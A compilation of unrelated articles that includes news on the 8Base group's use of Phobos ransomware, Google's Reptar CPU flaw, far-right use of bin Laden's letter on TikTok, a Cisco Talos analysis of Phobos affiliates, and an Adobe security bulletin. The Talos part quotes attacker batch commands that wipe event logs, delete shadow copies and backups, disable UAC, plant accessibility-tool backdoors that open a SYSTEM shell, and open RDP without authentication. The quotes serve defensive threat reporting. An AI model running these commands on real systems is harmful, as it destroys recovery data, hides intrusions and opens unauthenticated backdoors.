The threat actors behind the 8Base ransomware are leveraging a variant of the Phobos ransomware to conduct their financially motivated attacks.
The findings come from Cisco Talos, which has recorded an increase in activity carried out by cybercriminals.
“Most of the group’s Phobos variants are distributed by SmokeLoader, a backdoor trojan," security researcher Guilherme Venere said in an

The threat actors behind the **8Base ransomware** are leveraging a variant of the Phobos ransomware to conduct their financially motivated attacks.

The findings come from Cisco Talos, which has recorded an increase in activity carried out by cybercriminals.

"Most of the group's Phobos variants are distributed by SmokeLoader, a backdoor trojan," security researcher Guilherme Venere said in an exhaustive two-part analysis published Friday.

"This commodity loader typically drops or downloads additional payloads when deployed. In 8Base campaigns, however, it has the ransomware component embedded in its encrypted payloads, which is then decrypted and loaded into the SmokeLoader process' memory."

8Base came into sharp focus in mid-2023, when a similar spike in activity was observed by the cybersecurity community. It's said to be active at least since March 2022.

A previous analysis from VMware Carbon Black in June 2023 identified parallels between 8Base and RansomHouse, in addition to discovering a Phobos ransomware sample that was found using the ".8base" file extension for encrypted files.

This raised the likelihood that 8Base is either a successor to Phobos or that the threat actors behind the operation are merely using already existing ransomware strains to conduct their attacks, akin to the Vice Society ransomware group.

The latest findings from Cisco Talos show that SmokeLoader is used as a launchpad to execute the Phobos payload, which then carries out steps to establish persistence, terminate processes that may keep the target files open, disable system recovery, and delete backups as well as shadow copies.

Another notable characteristic is the full encryption of files that are below 1.5 MB and partial encryption of files above the threshold to speed up the encryption process.

Furthermore, the artifact incorporates a configuration with over 70 options that's encrypted using a hard-coded key. The configuration unlocks additional features such as User Account Control (UAC) bypass and reporting of a victim infection to an external URL.

There is also a hard-coded RSA key used to protect the per-file AES key used in the encryption, which Talos said could help enable decryption of files locked by the ransomware.

"Once each file is encrypted, the key used in the encryption along with additional metadata is then encrypted using RSA-1024 with a hard-coded public key, and saved to the end of the file," Venere elaborated.

"It implies, however, that once the private RSA key is known, any file encrypted by any Phobos variant since 2019 can reliably be decrypted."

Phobos, which first emerged in 2019, is an evolution of the Dharma (aka Crysis) ransomware, with the ransomware predominantly manifesting as the variants Eking, Eight, Elbie, Devos, and Faust, based on the volume of artifacts unearthed on VirusTotal.

"The samples all contained the same source code and were configured to avoid encrypting files that other Phobos affiliated already locked, but the configuration changed slightly depending on the variant being deployed," Venere said. "This is based on a file extension block list in the ransomware's configuration settings."

Cisco Talos assesses that Phobos is closely managed by a central authority, while being sold as a ransomware-as-a-service (RaaS) to other affiliates based on the same RSA public key, the variations in the contact emails, and regular updates to the ransomware's extension block lists.

"The extension blocklists appear to tell a story of which groups used that same base sample over time," Venere said.

"The extension block lists found in the many Phobos samples \[...\] are continually updated with new files that have been locked in previous Phobos campaigns. This may support the idea that there is a central authority behind the builder who keeps track of who used Phobos in the past. The intent could be to prevent Phobos affiliates from interfering with one another's operations."

The development comes as FalconFeeds disclosed that a threat actor is advertising a sophisticated ransomware product called UBUD that's developed in C and features "strong anti-detection measures against virtual machines and debugging tools."

It also follows a formal complaint filed by the BlackCat ransomware group with the U.S. Securities and Exchange Commission (SEC), alleging that one of its victims, MeridianLink, failed to comply with new disclosure regulations that require impacted companies to report the incident within four business days, DataBreaches.net reported.

The financial software company has since confirmed it was targeted in a cyber attack on November 10, but noted it found no evidence of unauthorized access to its systems.

While the SEC disclosure rules don't take effect until next month on December 18, the unusual pressure tactic is a sign that threat actors are closely watching the space and are willing to bend government regulations to their advantage and compel victims to pay up.

That said, it's worth noting that the enforcement exclusively applies in situations where the companies have identified that the attacks have had a "material" impact on their bottom lines.

Another prolific ransomware gang LockBit, in the meanwhile, has instituted new negotiation rules starting October 2023, citing less-than-expected settlements and larger discounts offered to victims due to the "different levels of experience of affiliates."

"Establish a minimum ransom request depending on the company's yearly revenue, for example at 3%, and prohibit discounts of more than 50%," the LockBit operators said, according to a detailed report from Analyst1.

"Thus, if the company's revenue is $100 million USD, the initial ransom request should start from $3 million USD with the final payout must be no less than $1.5 million USD."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

8Base Group Deploying New Phobos Ransomware Variant via SmokeLoader

By Deeba Ahmed
Intel CPU Vulnerability Impacts Multi-Tenant Virtualized Environments.
This is a post from HackRead.com Read the original post: Google Reveals ‘Reptar’ Vulnerability Threatening Intel Processors

Google has discovered a new security vulnerability in Intel CPUs that could let attackers execute code on vulnerable systems. The vulnerability has been named “Reptar” by Google and affects numerous Intel CPUs, including those utilized in cloud computing environments.

****What is Reptar Vulnerability?****

Reptar is a side-channel vulnerability tracked as CVE-2023-23583. It allows attackers to leak information from a vulnerable system and use it to steal sensitive data such as credit card numbers, passwords, etc.

The vulnerability was discovered by Google’s Information Security Engineering team, which notified Intel and industry partners about the issue, and mitigations were rolled out before its public disclosure.

****How Was Reptar Discovered?****

According to Google’s blog post, a company’s security researcher discovered it in the way the CPU interprets redundant prefixes, and if successfully exploited, it allows attackers to bypass the CPU’s security boundaries.

For your information, prefixes allow users to change how instructions behave by disabling/enabling different features. Those prefixes that don’t make sense or conflict with other prefixes are called redundant prefixes. Such prefixes are generally ignored.

****How does Reptar work?****

Reptar works by exploiting an issue in the way speculative execution is handled by Intel CPUs. Speculative execution is a technique that allows CPUs to execute instructions before being fully validated. Although this technique is time-saving, it can make CPUs vulnerable to side-channel attacks.

The Reptar vulnerability is a serious risk to multi-tenant virtualized environments, where the exploit causes the host machine to crash on a guest machine, resulting in a denial of service to other guest machines connected to the same host. In addition, it could lead to privilege escalation or information disclosure.

In a multi-tenant virtualized environment, multiple tenants share the same physical hardware, so if one tenant is infected with Reptar, the attacker has access to the other tenants’ data through the same vulnerability.

Aubrey Perin, Lead Threat Intelligence Analyst at Qualys, a Foster City, Calif.-based provider of disruptive cloud-based IT, security and compliance solutions commented on the issue stating, “Unmitigated, this bug could be serious as an attacker could start testing to see if there is any order to the seemingly random outputs. As it stands, it sounds more like an oddity that could be used to take systems down.”

Mr Perin further explained that “Without reviewing the catalogue of patches, it’s hard to say that it’s atypical of the bugs usually found. In this case, where it can cause crashes, security teams should definitely prioritize the patch implementation to eliminate the risk of failure.”

“Researchers do find vulnerabilities all the time, often for bounty, and it benefits users when responsible disclosure practices are followed. Google is a very good practitioner of responsible disclosure, and you can often find references to the researcher or organization who disclosed the vulnerability in the notes associated with patches,” he added.

****Intel’s Response****

Intel has released an advisory to confirm the issue, explaining that the issue was discovered in some Intel processors caused by an error in the CPU’s handling of redundant prefixes. The company has released a patch for the issue. It was assigned a CVSS score of 8.8 and declared a High-security vulnerability.

This CPU vulnerability impacts several Intel desktop, mobile, and server CPUs., including 10th Generation Intel® Core™ Processor Family, 3rd Generation Intel® Xeon® Processor Scalable Family, Intel® Xeon® D Processor, and 11th Generation Intel® Core Processor Family, and CPUs used in cloud computing environments, etc.

The company is working on a long-term fix. In the meantime, it is advising users to patch their devices immediately.

****_RELATED ARTICLES_****

1.  **Intel Responds to ‘Downfall’ Attack with Firmware Updates**
2.  **Plundervolt: A new attack on Intel processors threatening SGX data**
3.  **High severity Intel chip flaw left cars, medical, IoT devices vulnerable**

Google Reveals ‘Reptar’ Vulnerability Threatening Intel Processors

Far-right influencers and right-wing lawmakers are using the spread of Osama bin Laden’s “Letter to America” to call for a TikTok ban and boost decades old conspiracies.

A number of users have posted TikToks in recent days that share parts of Osama bin Laden’s 2002 “Letter to America,” where the deceased al Qaeda leader said the attacks on September 11, 2001, were justified. Posters used it to critique US foreign policy and have claimed that the letter changed their perspective. But while some have questioned the actual virality of these posts as conversations about these TikToks exploded on Thursday evening, far-right lawmakers and influencers have used the renewed interest in bin Laden to spread conspiracy theories about 9/11 and push their own anti-China agenda.

On his Thursday podcast, right-wing commentator and conspiracist Glenn Beck compared the TikTok posts to “the Antichrist forming,” and claimed the phenomenon shows “the terrifying threat America continues to face from global powers.” He then compared bin Laden’s worldview “to modern leftist talking points.”

Charlie Kirk, president of Turning Point USA, boosted conspiracies about public education. “Why is everyone shocked \[that\] a generation taught to hate America would embrace Osama Bin Laden?” Kirk wrote on Telegram.

One of his followers replied: “Not shocked. We as a whole let this crap happen in our ‘higher’ education. We did not pay attention to the way the marxists infiltrated and thought it was just going to go away. Not anymore!”

The issue has also led to renewed calls for TikTok to be banned by right-wing lawmakers who have repeatedly claimed, without evidence, that TikTok is used by the Chinese government to spy on US citizens.

“TikTok is an espionage tool and a propaganda machine for the Communists. First pro-Hamas propaganda, now bin Laden?” Senator Josh Hawley from Missouri wrote on X, the website formerly known as Twitter, on Thursday night. “The CCP probably can’t believe we’re letting them get away with it. Ban TikTok.”

Similar calls were repeated elsewhere on X and on platforms home to pro-Trump far-right extremists. The top post on the message board known as The Donald this morning read, “Either get rid of TikTok or surrender to China,” and linked to an article that claimed the bin Laden trend was a Chinese government plot to undermine US democracy.

On Telegram, a number of QAnon influencers and far-right figures used the renewed interest in the al Qaeda leader to boost conspiracy theories around the 9/11 terrorist attacks. “A lot of grown ass adults still don't question 9/11 being an inside job,” QAnon influencer Jordan Sather wrote on Telegram. “The CIA and Mossad perpetrated 911,” a follower of right-wing commentator Jack Posobiec wrote in response to a link Posobiec shared about the TikTok trend, adding: “Bin Laden was their MKUltra puppet and was protected in hiding.”

Still, it is unclear what sparked the sharing of bin Laden’s letter.

Based on a review of TikTok conducted by WIRED before the platform began removing videos, the first video directing viewers to read bin Laden’s letter was posted on Friday, November 10, by an account with just 3,800 followers. The video has only been viewed 1,133 times as of the morning of Friday, November 17, with just 12 comments.

The account is, however, quite prolific, and posts up to a dozen videos each day, most of which are reposted from other accounts. The account holder appears to be an avid Trump supporter, and they share questionable content including conspiracy theories mostly linked to president Joe Biden. One video shared this week suggested that Biden was in fact a body double.

Unlike some of the later videos, which garnered many more views, this account holder didn’t read any of the content of the letter, simply telling their followers: “It’s too much to say, but I need for you guys to go and google Osama bin Laden’s “Letter to America,” and read it. It will explain a lot.”

The video was posted 24 hours after searches for the bin Laden letter spiked, according to data from Google Trends. The account holder did not respond to WIRED’s request for comment on how they learned about the letter. (A TikTok spokesperson told WIRED that the company was removing the November 10 video after WIRED had flagged it, and WIRED can confirm the video has now been removed.)

Bin Laden’s letter did not gain much attention on TikTok until Monday, November 13, when another TikTok user posted a video urging people to go and read the letter. Again, this video, from an account with 12,800 followers, did not read specific lines from the letter, but showed the poster apparently in shock upon discovering the letter’s contents.

This video gained a lot more attention, racking up over 210,000 views before it was taken down on Thursday. Numerous other accounts tagged or referenced this video in their own “Letter to America” videos in the following days.

The account holder, who didn’t respond to a question from WIRED asking where she first heard about the letter, posted a follow-up video on Wednesday, November 15, explaining that she had heard about the bin Laden video over the weekend but didn’t have time to post about it until Monday, November 13, though she failed to say where she had seen it referenced.

Then, on Wednesday, _The Guardian_ removed an English translation of bin Laden’s letter from its website. The publication said they first noticed an uptick in traffic to the site on Thursday, November 9, but didn’t remove the letter until Wednesday, after videos about it were shared to TikTok.

“The transcript published on our website had been widely shared on social media without the full context,” a note on the website reads. “Therefore we decided to take it down and direct readers instead to the news article that originally contextualized it.”

After _The Guardian_ removed the letter, some accounts, including those on X, began sharing a link to a page on the website of the US Director of National Intelligence, which hosts a different letter written by bin Laden in 2008.

The removal of the letter sparked a flurry of new videos on TikTok criticizing _The Guardian_’s decision and claiming it was somehow evidence that bin Laden’s message was being censored, even though the letter is freely available elsewhere online.

The same day, journalist Yashar Ali shared a compilation of the TikTok videos on X, with the comment: “Many of them say that reading the letter has opened their eyes, and they’ll never see geopolitical matters the same way again.” As of Friday morning, that video on X has been viewed 37 million times.

“Content promoting this letter clearly violates our rules on supporting any form of terrorism,” TikTok spokesperson Ben Rathe told WIRED on Thursday afternoon. “We are proactively and aggressively removing this content and investigating how it got onto our platform.” TikTok did not, however, confirm how many related videos it had removed from the site or how many people had seen them.

In a statement posted Thursday night on X, TikTok said the spread of these videos was “not a trend,” and said that interest in the topic gained traction only after media outlets reported on it and tweets like Ali’s went viral. The social media site also said they would take down any TikToks referencing the letter and the hashtag #lettertoamerica. The company added that prior to Ali’s post, videos with the #lettertoamerica hashtag had been viewed 1.85 million times, but after the post they had been viewed 13 million times. (Google Trends data does show a significant spike in interest in the story after Ali’s tweet on Wednesday.)

“Does anyone remember the NyQuil Chicken Challenge?” TikTok asked in their statement. “It only got attention after the media created a moral panic.”

The company claimed that this number of views for this hashtag was relatively insignificant compared to some others on the platform, such as #travel, which had 137 million views during the same period, and #skincare, which had 252 million views.

The White House has also weighed in on the topic. “There is never a justification for spreading the repugnant, evil, and antisemitic lies that the leader of al Qaeda issued just after committing the worst terrorist attack in American history,” White House spokesman Andrew Bates told CNN.

Though it's still not clear exactly why this began, some disinformation researchers believe that the trend has all the hallmarks of a coordinated influence campaign.

“It was my gut instinct the second I saw the first video, reinforced by seeing others that were so similar and seemed scripted,” Tamsin Shaw, who teaches philosophy and politics at New York University and tracks social media’s impact on society, tells WIRED. “Then there was the fact that the actual eight-page letter is full of religious jargon, fairly hard to parse, would take longer than the attention span of someone on TikTok to read, and the kids posting about it were saying it was only two pages.”

The Bin Laden Letter Is Being Weaponized by the Far Right

Cisco Talos has recently observed an increase in activity conducted by 8Base, a ransomware group that uses a variant of the Phobos ransomware and other publicly available tools to facilitate their operations.

A deep dive into Phobos ransomware, recently deployed by 8Base group

Cisco Talos identified the most prolific Phobos variants, TTPs and affiliate structure, based on their activity and analysis of over 1,000 samples from VirusTotal dating back to 2019. We assess with moderate confidence Eking, Eight, Elbie, Devos and Faust are the most common variants

Friday, November 17, 2023 08:01

*   Cisco Talos recently identified the most prolific Phobos variants, common affiliate tactics, techniques and procedures (TTPs), and characteristics of the Phobos affiliate structure, based on observed Phobos activity and analysis of over 1,000 Phobos samples from VirusTotal dating back to 2019.
*   We assess with moderate confidence Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples we analyzed. 
*   The affiliates use similar TTPs to deploy Phobos and commonly target high-value servers, likely to pressure victims into paying the ransom. 
*   We assess with moderate confidence that the Phobos ransomware is closely managed by a central authority, as there is only one private key capable of decryption for all campaigns we observed.
*   There are also indications that Phobos may be sold as a ransomware-as-a-service (RaaS). We discovered hundreds of contact emails and IDs associated with Phobos campaigns, indicating the malware has a dispersed affiliate base, which is commonly seen among RaaS affiliates.

**Identifying the most prolific Phobos variants**

Phobos ransomware is an evolution of the Dharma/Crysis ransomware and, since it was first observed in 2019, has undergone only minimal developments despite its popularity among cybercriminal groups. This is a continuation of our analysis on Phobos ransomware, previously addressed in a blog on the ransomware group 8Base.

Talos identified five of the most prolific variants of the Phobos ransomware family, based on the volume of samples in VirusTotal. We examined several variations in the malware builder’s configuration settings, as this was the only distinguishing feature among the samples analyzed. The samples all contained the same source code and were configured to avoid encrypting files that other Phobos affiliated already locked, but the configuration changed slightly depending on the variant being deployed. 

For example, a Phobos sample deployed by the 8Base ransomware group contained a list of other Phobos variants that should not be encrypted, as seen below. A common trend for this configuration entry among all samples is that the group behind that specific sample had their name added to the beginning of the list.

__List of file extensions to be ignored by the encryption loop with names of previous campaigns.__

Once we extracted the samples’ configuration settings and identified the Phobos variant, Talos determined the most active Phobos affiliates by matching the most commonly observed variants with the unique IDs associated with each Phobos ransomware campaign. 

*   Eking: Active since at least 2019, usually targets users in the Asia-Pacific region.
*   Eight: Believed to be an older campaign run by the same group running 8Base now.
*   Elbie: Also seen targeting users in the APAC region and active since 2022.
*   Devos: Although this group has been active since 2019, not much has been written about it in terms of victimology or TTPs.
*   Faust: Another variant active since 2022 that does not target specific industries or regions.

The only differences between the samples of each variant are generally the contact email addresses used in the file extension for encrypted files, and the ransom note embedded in one of the settings, with all other settings being the same. The file extension used in all Phobos variants we analyzed follows the same template as the example shown below, where <<ID>> is replaced by the victim’s machine drive serial number. The next number is an identifier for the current campaign, then an email used to contact the ransomware actors is listed, and finally, the extension representing the variant is appended.

.id[<>-3253].[musonn@airmail[.]cc].eking

We defanged the email address for readers’ security, but the remaining square brackets are part of the actual extension used in all variants.

These variants have used hundreds of different contact emails over the past few years, as we can see in the graph below:

__Count of contact emails in use by each Phobos variant over the period of this research.__

These emails are generally created using free or secure email providers, shown below:

__Most common email providers in use for Phobos ransomware.__

In some cases, we have also seen affiliates using instant messaging services such as ICQ, Jabber and QQ to support their operations. The graph below illustrates the different providers chosen by the actors for each variant:

Devos

Eight

Elbie

Eking

Faust

email\[.\]tg

gmx\[.\]com

tutanota\[.\]com

tutanota\[.\]com

gmx\[.\]com

cock\[.\]li

aol\[.\]com

onionmail\[.\]org

airmail\[.\]cc

tutanota\[.\]com

protonmail\[.\]com

protonmail\[.\]com

tuta\[.\]io

aol\[.\]com

onionmail\[.\]org

libertymail\[.\]net

tutanota\[.\]com

techmail\[.\]info

firemail\[.\]cc

waifu\[.\]club

qq\[.\]com

onionmail\[.\]org

cock\[.\]li

tuta\[.\]io

tuta\[.\]io

pressmail\[.\]ch

cock\[.\]li

privatemail\[.\]com

protonmail\[.\]com

gmail\[.\]com

medmail\[.\]ch

keemail\[.\]me

gmail\[.\]com

cock\[.\]li

airmail\[.\]cc

tutanota\[.\]com

mailfence\[.\]com

yandex\[.\]ru

criptext\[.\]com

mailfence\[.\]com

cumallover\[.\]me

zohomail\[.\]eu

msgsafe\[.\]io

ctemplar\[.\]com

xmpp\[.\]jp

airmail\[.\]cc

zohomail\[.\]com

cyberfear\[.\]com

gmx\[.\]com

zohomail\[.\]eu

countermail\[.\]com

ICQ@HONESTHORSE

aol\[.\]com

techmail\[.\]info

cock\[.\]li

mailfence\[.\]com

ICQ@VIRTUALHORSE

  

msgsafe\[.\]io

zohomail\[.\]com

mail\[.\]fr

  

  

  

lenta\[.\]ru

  

  

  

  

proton\[.\]me

  

  

  

  

privatemail\[.\]com

We observed Devos affiliates using QQ\[.\]com, a Chinese instant message application, and eight affiliates using ICQ, an instant message service currently owned by a Russian company. We also saw the use of service providers that are considered to be more secure than others, like Proton Mail. This diversity of providers further supports our assessment that Phobos has a dispersed affiliate base and may be operating as a RaaS. 

Because of the varied use of the email service providers listed above, and the sheer number of different contact emails in use for each variant, Talos assesses with moderate confidence that multiple threat actors are behind each of these variants instead of a single threat actor moving to different providers to avoid being banned.

**Observed tactics, techniques and procedures in Phobos intrusions**

In early 2023, Talos observed an intrusion associated with the “Elbie” variant of Phobos. In this attack, the threat actor targeted the organization’s exchange server and then moved laterally, attempting to compromise additional server-side infrastructure including backup servers, database servers and hypervisor hosts. Rather than attempting to deploy the ransomware to a large number of systems concurrently, the attackers appeared to focus on specific infrastructure and attempted to deploy the ransomware on each system individually. We believe this is because Phobos affiliates usually go after high-value servers in the victim’s network as a way to increase the damage and chance of a payout.

After gaining initial access to the organization’s exchange server, the attackers created a working directory in the compromised user’s Desktop directory and attempted to drop various tools including, but not limited to:

*   Process Hacker: A process visualization tool which also contains a kernel mode driver used by malicious actors sometimes to delete files, services and kill processes.
*   Automim: This toolkit enables automated credential collection on compromised hosts and includes the LaZagne and Mimikatz utilities.
*   IObit File Unlocker: A tool used to remove a lock on files open by other applications, used by malicious actors to increase the chance of encrypting files like databases, open documents and similar files that are usually kept open.
*   Nirsoft Password Recovery Toolkit: A toolkit used to extract passwords for common applications like browsers and email clients.
*   Network Scanner (NS.exe): An executable used to scan the network for open services and move laterally over the network.
*   Angry IP Scanner: A tool used to scan the network for open services and identify network information for the machines found.

The attacker also dropped a variety of batch files responsible for various post-compromise activities.

One batch file clears Windows event logs on compromised systems to minimize forensic artifacts and make detection more difficult:

FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I")

Another was responsible for deleting Volume shadow copies, likely to make recovery following Phobos deployment more difficult:

vssadmin delete shadows /all /quiet  
wmic shadowcopy delete  
bcdedit /set {default} bootstatuspolicy ignoreallfailures  
bcdedit /set {default} recoveryenabled no  
wbadmin delete catalog -quiet  
exit

The script above is included in the Phobos configuration as we noted in our previous blog, which is extracted and saved as a temporary .BAT file before the encryption process starts.

Additionally, a batch file was created to configure the Windows Registry keys that enable the accessibility features present on the Windows logon screen to spawn a SYSTEM-level command prompt without requiring previous authentication. This may have been used as a persistence mechanism, allowing the attacker to regain full control of systems via RDP later in the attack. 

First, the script disables User Account Control (UAC) on the system by setting the following Registry entry:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

Next, the script sets the Image File Execution Options debugger entry for various accessibility features to the Windows Command Processor. This allows an attacker to execute an elevated command shell on the system by invoking the accessibility features from the Windows logon screen. Any time one of these applications is launched, the debugging application specified is launched with elevated permissions instead, which in this case, is the Windows command processor. 

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"

Finally, the script configures various Registry entries responsible for enabling RDP and disabling network-level authentication. 

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"

An additional script dropped by the threat actor was responsible for making the following service configuration changes on compromised systems:

sc config Dnscache start= auto  
net start Dnscache  
sc config SSDPSRV start= auto  
net start SSDPSRV  
sc config FDResPub start= auto  
net start FDResPub  
sc config upnphost start= auto  
net start upnphost

File-sharing was enabled on compromised hosts via the following command execution:

dism /online /enable-feature /featurename:File-Services /NoRestart

The attacker also attempted to uninstall endpoint protection software on compromised hosts to minimize detection of various components used throughout the attack and prevent alerting security staff. 

Once the defenses were disabled and the persistence mechanisms enabled, the threat actor deployed the Phobos ransomware, encrypting the files in the server. In this case, the variant we observed during the infection was part of the “Elbie” campaign and displayed the same behavior we described in our previous blog. At the end of the process, the ransom note “_info.hta_” was dropped to the user’s Desktop with details on how to contact the attacker:

__Example of Phobos info.hta displaying the contact address.__

**Unveiling the developers and affiliates behind Phobos**

Through our analysis of Phobos campaigns and malware samples, we made several discoveries that helped shed light on mysteries surrounding the ransomware’s little-known affiliate structure and developers.

There is some indication that Phobos may be a RaaS, due to the variation in email addresses we observed. Each Phobos variant from VirusTotal was associated with at least a dozen emails that were provided to victims to maintain contact, and some had close to 200 unique email addresses with various domains. In some instances, ICQ and Jabber were used as the main contact address. While it’s possible that there is a single group behind Phobos, it would be uncommon to have a threat actor change their contact email address so often. This would take extra time and effort while many ransomware campaigns very successfully use just a few contact addresses. For example, when we observed the ransomware group 8base using Phobos as described in our other blog, they only used a single contact email, “_support@rexsdata\[.\]pro_”.

We also assess that Phobos is likely closely managed by a central authority that controls the ransomware’s private decryptor key. For each file Phobos decides to encrypt, it generates a random AES key to use in the encryption, then encrypts this key along with some metadata with an RSA key present in the configuration data, and saves this data at the end of the encrypted file. That means in order to decrypt the file, one needs the private key corresponding to that public RSA key.

Every Phobos sample we analyzed contains the same public RSA key in its configuration data, implying there is only one private key capable of decryption. We assess that a single threat actor controls the private key as every single sample we analyzed contains the same public key. It’s possible the Phobos developer offers the decryption service to their affiliates for a cut of their proceedings. 

During our research, we did find variants of these decryptors in the wild, like this sample found in VirusTotal which promises to decrypt samples for the “**_Elbie_**” variant. However, the decryptor needs two pieces of information that are not available in the file itself, so using it to decrypt samples is not possible. 

__Phobos decryption tool screen asks for base64-encoded data.__

The first piece needed seems to be a file with a base64-encoded encrypted blob of data which seems to be the RSA private key used to decrypt the samples. The second piece of information needed is a password which is used to decrypt the content of this blob. So, it may be possible for the RSA private key to be recovered if these two pieces of data are found, shared by a victim who paid for the decryption or leaked it in the wild. 

Further supporting our assessment that Phobos is run by a central authority, is how meticulously the ransomware’s extension block lists are updated. As we stated previously, Phobos avoids encrypting files that were previously locked by other Phobos affiliates. This is based on a file extension block list in the ransomware’s configuration settings. The extension blocklists appear to tell a story of which groups used that same base sample over time. When a malware builder tool usually generates a binary for a campaign, it does so based on a fixed and clean “stub” binary, which is then populated with whatever payload of configuration is necessary for that current build. This is not what happens with Phobos.

The extension block lists found in the many Phobos samples Talos analyzed are continually updated with new files that have been locked in previous Phobos campaigns. This may support the idea that there is a central authority behind the builder who keeps track of who used Phobos in the past. The intent could be to prevent Phobos affiliates from interfering with one another's operations.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

ClamAV detections are available for this threat:

**Win.Packed.Zusy  
Win.Ransomware.8base  
Win.Downloader.Generic  
Win.Ransomware.Ulise**

**IOCs**

Indicators of Compromise associated with this threat can be found here.

Understanding the Phobos affiliate structure and activity

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe After Effects | APSB23-66

Bulletin ID

Date Published

Priority

ASPB23-66  

November 14, 2023    

3

**Summary**

Adobe has released an update for Adobe After Effects for Windows and macOS.  This update addresses  critical and moderate security vulnerabilities.  Successful exploitation could lead to arbitrary code execution and memory leak in the context of the current user.         

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe After Effects

24.0.2 and earlier versions     

Windows and macOS

Adobe After Effects  

23.6 and earlier versions       

Windows and macOS  

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app’s update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority Rating

Availability

Adobe After Effects

24.0.3  

Windows and macOS

3

Download Center

Adobe After Effects  

23.6.2

Windows and macOS

3

Download Center  

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.

**Vulnerability Details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47066  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47067  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47068  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47069  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47070  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2023-47073  

Out-of-bounds Read (CWE-125)  

Memory leak  

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2023-47071  

Access of Uninitialized Pointer (CWE-824)  

Memory leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2023-47072  

**Acknowledgements**

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative  - CVE-2023-47066, CVE-2023-47067, CVE-2023-47068, CVE-2023-47069, CVE-2023-47070, CVE-2023-47071, CVE-2023-47072, CVE-2023-47073  
    

NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2023-47073: Adobe Security Bulletin

